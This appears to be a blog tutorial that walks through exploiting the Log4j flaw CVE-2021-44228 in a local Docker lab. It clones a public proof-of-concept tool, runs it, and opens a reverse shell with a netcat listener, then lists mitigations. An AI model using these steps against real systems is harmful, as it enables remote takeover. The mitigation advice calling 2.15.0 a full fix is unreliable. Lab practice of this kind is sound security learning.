Exploit the Log4J Vulnerability – CVE-2021-44228

Image Source: https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html

The Log4j vulnerability is a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library. It was first disclosed on December 9, 2021, and is considered to be one of the most serious software vulnerabilities ever discovered.

The vulnerability exists in the way that Log4j processes certain types of log messages. An attacker can exploit this vulnerability by sending a specially crafted log message to a vulnerable system. This message can then be used to execute arbitrary code on the system.

The Log4j vulnerability affects a wide range of software, including many popular applications and services. Some of the known victims of the vulnerability include Minecraft, Amazon Web Services, Cisco, and VMware.

Reqirements

– Exploit Tool(https://github.com/kozmer/log4j-shell-poc)
– Vulnerable jdk Version
– Victim Endpoint
– Attacker Endpoing(Optional)

Now let’s make a Poc of how we can exploit this vulnerability.

Download the tool

git clone https://github.com/kozmer/log4j-shell-poc

And then, install the requirements.txt

pip install -r requirements.txt

Let’s install the Docker to fetch vulnerable application.

sudo snap install docker

Now, let’s go into the folder where the exploit tool we downloaded is and fetch the vulnerable docker image.

Let’s check docker images

Let’s run our build command to get our image up and running.

docker run --network host log4j-shell-poc

Then check the localhost:8080 and be sure that application is up or not.

Now let’s download one of the older versions of jdk. I will prefer jdk-8u20-linux.

Move the jdk to inside of exploit tool.

mv jdk-8u20-linux-x64.tar.gz /home/ali/Desktop/log4j-shell-poc-main

Then extract the tar file.

tar -xf jdk-8u20-linux-x64.tar.gz

Now, run the poc.py script with necessary parameters.

python3 poc.py --userip localhost --webport 8000 --lport 9001

Let’s paste the line printed by the script into the application running on our local host.

Before click login button, we can start listener.

nc -lvnp 9001

Then, when we click Login button we can see that we obtain Reverse Shell.

How to Prevent Ourselves against Log4j Vulnerability?

• Upgrade to the latest version of Log4j. The vulnerability has been patched in Log4j version 2.15.0 and later, so upgrading to the latest version is the best way to protect yourself.
• Disable JNDI lookups. If you are unable to upgrade to the latest version of Log4j, you can disable JNDI lookups in your Log4j configuration. This will prevent attackers from exploiting the vulnerability.
• Implement a web application firewall (WAF). A WAF can be used to block malicious requests that are trying to exploit the Log4j vulnerability.
• Monitor your systems for suspicious activity. Even if you have taken all of the above steps, it is still important to monitor your systems for suspicious activity. This will help you to detect and respond to any attacks that may occur.
• Identify Affected Systems Determine which of your systems use Log4j. This may include web applications, server applications, and any software relying on Log4j for logging.